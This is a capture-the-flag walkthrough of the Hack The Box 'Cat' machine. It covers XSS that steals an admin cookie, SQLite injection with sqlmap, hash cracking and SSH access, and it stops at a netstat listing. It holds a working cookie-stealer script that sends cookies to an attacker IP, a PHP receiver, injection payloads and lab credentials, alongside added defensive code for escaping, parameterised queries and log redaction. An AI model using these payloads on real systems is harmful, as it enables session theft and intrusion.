HTB — Cat
Apache mod_rewrite CVE-2024-38472 XSS in redirect. Stored XSS steals admin cookie for Gitea access. SQLite injection and Gitea hook RCE for root.
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-01 23:48 EST
Nmap scan report for 10.10.11.53
Host is up (0.029s latency).
Not shown: 65493 closed tcp ports (reset), 40 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_ 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 22.20 ms 10.10.14.1
2 22.33 ms 10.10.11.53
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.28 seconds
sudo nmap -sU -sV -sC -p U:161,162,53,22,110,143,623,993,995 10.10.11.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-01 23:50 EST
Nmap scan report for 10.10.11.53
Host is up (0.024s latency).
PORT STATE SERVICE VERSION
22/udp closed ssh
53/udp closed domain
110/udp closed pop3
143/udp closed imap
161/udp closed snmp
162/udp closed snmptrap
623/udp closed asf-rmcp
993/udp closed imaps
995/udp open|filtered pop3s
80
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
dirsearch
dirsearch -u http://cat.htb
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Cat/reports/http_cat.htb/_25-02-02_00-36-53.txt
Target: http://cat.htb/
[00:36:53] Starting:
[00:36:55] 301 - 301B - /.git -> http://cat.htb/.git/
[00:36:55] 403 - 272B - /.git/
[00:36:55] 200 - 92B - /.git/config
[00:36:55] 200 - 7B - /.git/COMMIT_EDITMSG
[00:36:55] 200 - 23B - /.git/HEAD
[00:36:55] 403 - 272B - /.git/branches/
[00:36:55] 403 - 272B - /.git/hooks/
[00:36:55] 200 - 73B - /.git/description
[00:36:55] 200 - 240B - /.git/info/exclude
[00:36:55] 200 - 2KB - /.git/index
[00:36:55] 403 - 272B - /.git/info/
[00:36:55] 403 - 272B - /.git/logs/
[00:36:55] 200 - 150B - /.git/logs/HEAD
[00:36:55] 301 - 311B - /.git/logs/refs -> http://cat.htb/.git/logs/refs/
[00:36:55] 200 - 150B - /.git/logs/refs/heads/master
[00:36:55] 301 - 317B - /.git/logs/refs/heads -> http://cat.htb/.git/logs/refs/heads/
[00:36:55] 403 - 272B - /.git/objects/
[00:36:55] 301 - 312B - /.git/refs/heads -> http://cat.htb/.git/refs/heads/
[00:36:55] 403 - 272B - /.git/refs/
[00:36:55] 200 - 41B - /.git/refs/heads/master
[00:36:55] 301 - 311B - /.git/refs/tags -> http://cat.htb/.git/refs/tags/
[00:36:55] 403 - 272B - /.ht_wsr.txt
[00:36:55] 403 - 272B - /.htaccess.orig
[00:36:55] 403 - 272B - /.htaccess.sample
[00:36:55] 403 - 272B - /.htaccessBAK
[00:36:55] 403 - 272B - /.htaccess.bak1
[00:36:55] 403 - 272B - /.htaccess.save
[00:36:55] 403 - 272B - /.htaccessOLD
[00:36:55] 403 - 272B - /.htaccess_orig
[00:36:55] 403 - 272B - /.htaccess_sc
[00:36:55] 403 - 272B - /.htaccess_extra
[00:36:55] 403 - 272B - /.html
[00:36:55] 403 - 272B - /.htaccessOLD2
[00:36:55] 403 - 272B - /.htm
[00:36:55] 403 - 272B - /.htpasswd_test
[00:36:55] 403 - 272B - /.htpasswds
[00:36:55] 403 - 272B - /.httr-oauth
[00:36:56] 403 - 272B - /.php
[00:37:00] 302 - 1B - /admin.php -> /join.php
[00:37:08] 200 - 1B - /config.php
[00:37:10] 301 - 300B - /css -> http://cat.htb/css/
[00:37:15] 301 - 300B - /img -> http://cat.htb/img/
[00:37:18] 302 - 0B - /logout.php -> /
[00:37:27] 403 - 272B - /server-status
[00:37:27] 403 - 272B - /server-status/
[00:37:33] 301 - 304B - /uploads -> http://cat.htb/uploads/
[00:36:55] 403 - 272B - /uploads/
vhost fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://cat.htb/ -H 'Host: FUZZ.cat.htb' -fw 20 -mc all
git dumper
git-dumper http://cat.htb/.git ./website
XSS cookie
script.js
new Image().src='http://10.10.14.13/index.php?c='+document.cookie
index.php
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
sudo php -S 0.0.0.0:80
- create username with below and login
<script src=http://10.10.14.13/script.js></script>
- send something with contest

sudo php -S 0.0.0.0:80
[Sun Feb 2 17:44:46 2025] PHP 8.2.27 Development Server (http://0.0.0.0:80) started
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50118 Accepted
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50118 [200]: GET /script.js
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50118 Closing
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50124 Accepted
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50124 [200]: GET /index.php?c=PHPSESSID=hsljj5j7m2mjjlb4tbobejfedk
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50124 Closing
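The PHPSESSID shows up in document.cookie above because the username is rendered into the page unescaped and the session cookie is not HttpOnly. The Python below is an added example, not code from this writeup or from the box: it shows the two fixes (output encoding and an HttpOnly cookie) plus a check a responder could run over a dumped users table to find display names carrying markup. The sample rows and the ATTACKER_HOST placeholder are constructed.

```python
import html
import re
from typing import Dict, List

# A tag, a javascript: URL or an inline event handler has no business in a
# display name. Deliberately simple so it can be audited by eye.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def is_suspicious_username(username: str) -> bool:
    """True when a stored username carries HTML/JS markup (stored-XSS indicator)."""
    return MARKUP_RE.search(username) is not None


def render_username(username: str) -> str:
    """Output encoding for an HTML text node.

    html.escape(quote=True) turns < > & " ' into entities, so the browser
    shows the name as text instead of parsing it as a tag.
    """
    return html.escape(username, quote=True)


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for a session cookie that page scripts cannot read.

    HttpOnly keeps the value out of document.cookie, so injected script has
    nothing to exfiltrate; Secure and SameSite limit replay.
    """
    return f"Set-Cookie: PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def audit_users(rows: List[Dict[str, str]]) -> List[int]:
    """Return the user_ids whose stored username contains markup."""
    return [int(r["user_id"]) for r in rows if is_suspicious_username(r["username"])]


# Constructed sample in the shape of the users table; row 3 follows the
# pattern seen in the writeup with a placeholder host.
SAMPLE_USERS = [
    {"user_id": "1", "username": "axel"},
    {"user_id": "2", "username": "O'Brien"},
    {"user_id": "3", "username": "<script src=http://ATTACKER_HOST/script.js></script>"},
]

if __name__ == "__main__":
    for uid in audit_users(SAMPLE_USERS):
        print(f"user_id {uid}: markup in username")
    print(render_username(SAMPLE_USERS[2]["username"]))
    print(session_cookie_header("EXAMPLE_SESSION_ID"))
```

In PHP the equivalent calls are htmlspecialchars() on output and session.cookie_httponly=1 in php.ini; the audit function is what you would run after the fact to see which accounts were created with payloads in them.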

view_cat.php

sql injection
- in contest upload another sample
- click on Admin
- click on Accept
- intercept the post request and send to burp
- create username with below and login
<script src=http://10.10.14.13/script.js></script>
- send a contest sample request and wait for admin cookies
- change admin cookies in inspect element
sqlmap -r req.txt --batch --random-agent --level=5 --risk=3 --no-cast
___
__H__
___ ___[.]_____ ___ ___ {1.9#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:50:48 /2025-02-02/
[18:50:48] [INFO] parsing HTTP request from 'req.txt'
[18:50:48] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[18:50:48] [INFO] testing connection to the target URL
[18:50:48] [INFO] testing if the target URL content is stable
[18:50:48] [INFO] target URL content is stable
[18:50:48] [INFO] testing if POST parameter 'catName' is dynamic
[18:50:48] [WARNING] POST parameter 'catName' does not appear to be dynamic
[18:50:48] [WARNING] heuristic (basic) test shows that POST parameter 'catName' might not be injectable
[18:50:49] [INFO] testing for SQL injection on POST parameter 'catName'
[18:50:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:50:52] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[18:50:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[18:50:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[18:51:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[18:51:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[18:51:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[18:51:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[18:51:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:51:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:51:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:51:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[18:51:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[18:51:13] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:51:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:51:19] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:51:22] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:51:25] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:51:27] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:51:30] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:51:32] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[18:51:35] [INFO] testing 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)'
[18:51:38] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[18:51:40] [INFO] testing 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[18:51:43] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[18:51:43] [INFO] POST parameter 'catName' appears to be 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)' injectable (with --code=200)
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[18:51:43] [INFO] testing 'Generic inline queries'
[18:51:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:51:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:51:44] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[18:51:45] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[18:51:45] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[18:51:46] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[18:51:47] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[18:51:47] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[18:51:48] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[18:51:49] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[18:51:50] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[18:51:50] [INFO] checking if the injection point on POST parameter 'catName' is a false positive
POST parameter 'catName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1716 HTTP(s) requests:
---
Parameter: catName (POST)
Type: boolean-based blind
Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
Payload: catName=test' AND CASE WHEN 6744=6744 THEN 6744 ELSE JSON(CHAR(80,78,117,103)) END AND 'Foiz'='Foiz&catId=1
sqlmap -r req.txt --batch --random-agent --level=5 --risk=3 --no-cast --dbs
[*] starting @ 18:53:49 /2025-02-02/
[18:53:49] [INFO] parsing HTTP request from 'req.txt'
[18:53:49] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040802 Firefox/0.9.2' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[18:53:49] [INFO] resuming back-end DBMS 'sqlite'
[18:53:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: catName (POST)
Type: boolean-based blind
Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
Payload: catName=test' AND CASE WHEN 6744=6744 THEN 6744 ELSE JSON(CHAR(80,78,117,103)) END AND 'Foiz'='Foiz&catId=1
---
[18:53:49] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: SQLite
sqlmap -r req.txt --batch --random-agent --tables
[*] starting @ 18:58:15 /2025-02-02/
[18:58:16] [INFO] parsing HTTP request from 'req.txt'
[18:58:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[18:58:16] [INFO] resuming back-end DBMS 'sqlite'
[18:58:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: catName (POST)
Type: boolean-based blind
Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
Payload: catName=test' AND CASE WHEN 6744=6744 THEN 6744 ELSE JSON(CHAR(80,78,117,103)) END AND 'Foiz'='Foiz&catId=1
---
[18:58:16] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: SQLite
[18:58:16] [INFO] fetching tables for database: 'SQLite_masterdb'
sqlmap -r req.txt --batch --dump --level 5 --risk 3 --random-agent --tamper=between --technique=t --tables
[*] starting @ 19:11:47 /2025-02-02/
[19:11:47] [INFO] parsing HTTP request from 'req.txt'
[19:11:47] [INFO] loading tamper module 'between'
[19:11:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.1 Safari/532.0' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[19:11:47] [INFO] resuming back-end DBMS 'sqlite'
[19:11:47] [INFO] testing connection to the target URL
[19:11:47] [WARNING] heuristic (basic) test shows that POST parameter 'catName' might not be injectable
[19:11:47] [INFO] testing for SQL injection on POST parameter 'catName'
[19:11:47] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[19:11:47] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[19:11:55] [INFO] POST parameter 'catName' appears to be 'SQLite > 2.0 AND time-based blind (heavy query)' injectable
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[19:11:55] [INFO] checking if the injection point on POST parameter 'catName' is a false positive
POST parameter 'catName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: catName (POST)
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: catName=test212' AND 2243=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'QSsW'='QSsW&catId=1
---
[19:12:27] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:12:27] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: SQLite
[19:12:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[19:12:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[19:12:27] [INFO] retrieved:
[19:12:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
4
[19:12:31] [INFO] retrieved:
[19:12:38] [INFO] adjusting time delay to 2 seconds due to good response times
accepted_cats
[19:13:36] [INFO] retrieved: sqlite_sequence
[19:14:46] [INFO] retrieved: cats
[19:15:03] [INFO] retrieved: users
<current>
[4 tables]
+-----------------+
| accepted_cats |
| cats |
| sqlite_sequence |
| users |
+-----------------+
- have to do it fast, therefore need to increase the thread count: --threads=4
sqlmap -r req.txt -p catName --dbms=SQLite --batch --level 5 --risk 3 --threads=4 --technique=B -T 'users' --dump --flush-session
[*] starting @ 22:51:04 /2025-02-03/
[22:51:04] [INFO] parsing HTTP request from 'req.txt'
[22:51:04] [INFO] flushing session file
[22:51:04] [INFO] testing connection to the target URL
[22:51:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:51:04] [INFO] testing if the target URL content is stable
[22:51:04] [INFO] target URL content is stable
[22:51:04] [WARNING] heuristic (basic) test shows that POST parameter 'catName' might not be injectable
[22:51:04] [INFO] testing for SQL injection on POST parameter 'catName'
[22:51:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:51:07] [INFO] POST parameter 'catName' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[22:51:07] [INFO] checking if the injection point on POST parameter 'catName' is a false positive
POST parameter 'catName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: catName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catName=test'||(SELECT CHAR(106,116,69,84) WHERE 1792=1792 AND 9608=9608)||'&catId=1
---
[22:52:38] [INFO] retrieved: <script src=http://10.10.14.13/script.js></script>
[22:52:38] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[22:52:38] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[22:52:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[22:52:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[22:52:38] [INFO] starting 6 processes
[22:52:41] [INFO] cracked password 'test' for user '<script src=http://10.10.14.13/script.js></script>'
Database: <current>
Table: users
[11 entries]
+---------+-------------------------------+-----------------------------------------+----------------------------------------------------+
| user_id | email | password | username |
+---------+-------------------------------+-----------------------------------------+----------------------------------------------------+
| 1 | axel2017@gmail.com | d1bbba36... | axel |
| 2 | rosamendoza485@gmail.com | ac369922... | rosa |
| 3 | robertcervantes2000@gmail.com | 42846631... | robert |
| 4 | fabiancarachure2323@gmail.com | 39e153e8... | fabian |
| 5 | jerrysonC343@gmail.com | 781593e0... | jerryson |
| 6 | larryP5656@gmail.com | 1b6dce24... | larry |
| 7 | royer.royer2323@gmail.com | c598f6b844a36fa7836fba0835f1f6 | royer |
| 8 | peterCC456@gmail.com | e41ccefa... | peter |
| 9 | angel234g@gmail.com | 24a8ec00... | angel |
| 10 | jobert2020@gmail.com | 88e4dcec... | jobert |
| 11 | test@email.com | 098f6bcd... (test) | <script src=http://10.10.14.13/script.js></script> |
+---------+-------------------------------+-----------------------------------------+----------------------------------------------------+
d1bbba36...
ac369922...
42846631...
39e153e8...
781593e0...
1b6dce24...
c598f6b844a36fa7836fba0835f1f6
e41ccefa...
24a8ec00...
88e4dcec...
- only rosa's md5 hash cracked.
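view_cat.php splices catName straight into its SQLite query, which is what the boolean-based blind probes above exploit. The following is an added example in Python with sqlite3, not the box's PHP: the string-built query beside the parameterised one, run against a constructed cats table, showing that only the concatenated version lets a true/false pair of inputs change the result set (the oracle sqlmap measures).

```python
import sqlite3
from typing import Callable, List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a constructed 'cats' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cats (cat_id INTEGER PRIMARY KEY, cat_name TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO cats (cat_name, owner) VALUES (?, ?)",
        [("test", "axel"), ("Whiskers", "rosa")],
    )
    return conn


def find_cat_unsafe(conn: sqlite3.Connection, cat_name: str) -> List[Tuple]:
    """String-built query: the input becomes part of the SQL grammar."""
    sql = "SELECT cat_id, cat_name FROM cats WHERE cat_name = '" + cat_name + "'"
    return conn.execute(sql).fetchall()


def find_cat_safe(conn: sqlite3.Connection, cat_name: str) -> List[Tuple]:
    """Parameterised query: the driver binds the value; it is never re-parsed."""
    return conn.execute(
        "SELECT cat_id, cat_name FROM cats WHERE cat_name = ?", (cat_name,)
    ).fetchall()


# One always-true and one always-false condition, the shape a boolean-based
# blind probe takes. Constructed for this example.
TRUE_PROBE = "test' AND 1=1 AND 'a'='a"
FALSE_PROBE = "test' AND 1=2 AND 'a'='a"


def oracle_visible(conn: sqlite3.Connection, finder: Callable) -> bool:
    """True when the two probes yield different result sets, i.e. the
    application leaks one bit about the injected condition per request."""
    return finder(conn, TRUE_PROBE) != finder(conn, FALSE_PROBE)


if __name__ == "__main__":
    conn = make_db()
    print("concatenated query leaks an oracle:", oracle_visible(conn, find_cat_unsafe))
    print("parameterised query leaks an oracle:", oracle_visible(conn, find_cat_safe))
```

The PHP equivalent is PDO::prepare() with bound parameters; the --no-cast and JSON() tricks in the sqlmap output are only refinements of the same one-bit oracle, and all of them disappear once the value is bound instead of concatenated.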
hashcat -m 0 'ac369922...' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6-851-g6716447df) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-13th Gen Intel(R) Core(TM) i9-13900HX, 5327/10718 MB (2048 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ac369922...:soyunaprincesarosa
ssh as rosa
ssh rosa@10.10.11.53
rosa@10.10.11.53's password: soyunaprincesarosa
rosa@cat:~$ whoami
rosa
adm group
- this group can read logs
rosa@cat:~$ id
uid=1001(rosa) gid=1001(rosa) groups=1001(rosa),4(adm)
rosa@cat:/var/log$ grep -rn ./ -ie 'pass'
./apache2/access.log.1:2753:127.0.0.1 - - [02/Feb/2025:23:59:36 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
./apache2/access.log.1:2773:127.0.0.1 - - [02/Feb/2025:23:59:57 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&log
creds
axel:aNdZwgC4tI9gnVXv_e3Q
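The grep works because join.php submits the login form with GET, so Apache writes the password into access.log, which every member of adm can read. The Python below is an added example, not part of the writeup: a parser for combined-format lines that flags sensitive query parameters, and a redaction helper for a log pipeline. The sample lines are constructed, with a placeholder in place of any real password.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Apache combined log format: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
# Parameter names that should never be carried in a URL.
SENSITIVE_PARAM_RE = re.compile(r"pass(word|wd)?|pwd|secret|token|api_?key", re.IGNORECASE)


def credential_leaks(log_lines: List[str]) -> List[Dict[str, object]]:
    """Flag entries whose request target carries a sensitive-looking query parameter."""
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        for key, _value in parse_qsl(parts.query, keep_blank_values=True):
            if SENSITIVE_PARAM_RE.search(key):
                findings.append({"line": lineno, "time": m.group("time"),
                                 "path": parts.path, "param": key})
    return findings


def redact_request_target(target: str) -> str:
    """Replace the value of any sensitive parameter before the line is stored."""
    parts = urlsplit(target)
    if not parts.query:
        return target
    pairs = [(k, "REDACTED" if SENSITIVE_PARAM_RE.search(k) else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


# Constructed sample lines in the format of the log above; the password is a placeholder.
SAMPLE_LOG = [
    '127.0.0.1 - - [02/Feb/2025:23:59:36 +0000] "GET /join.php?loginUsername=axel&loginPassword=PLACEHOLDER_PW&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0"',
    '10.0.0.5 - - [02/Feb/2025:23:59:40 +0000] "GET /view_cat.php?catId=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [02/Feb/2025:23:59:41 +0000] "POST /join.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in credential_leaks(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']} sent in query string to {f['path']} at {f['time']}")
    print(redact_request_target("/join.php?loginUsername=axel&loginPassword=PLACEHOLDER_PW"))
```

Fixing the form to POST removes the query string from the %r field; logging %U (path only) instead of %r in the LogFormat drops query strings for every handler; and trimming adm membership addresses the read side that this box relied on.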
axel
rosa@cat:/home$ su axel
Password:
axel@cat:/home$ whoami
axel
user.txt
axel@cat:~$ cat user.txt
ee2b0788...
Priv Esc
axel@cat:~$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:44935 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33269 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:39035 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
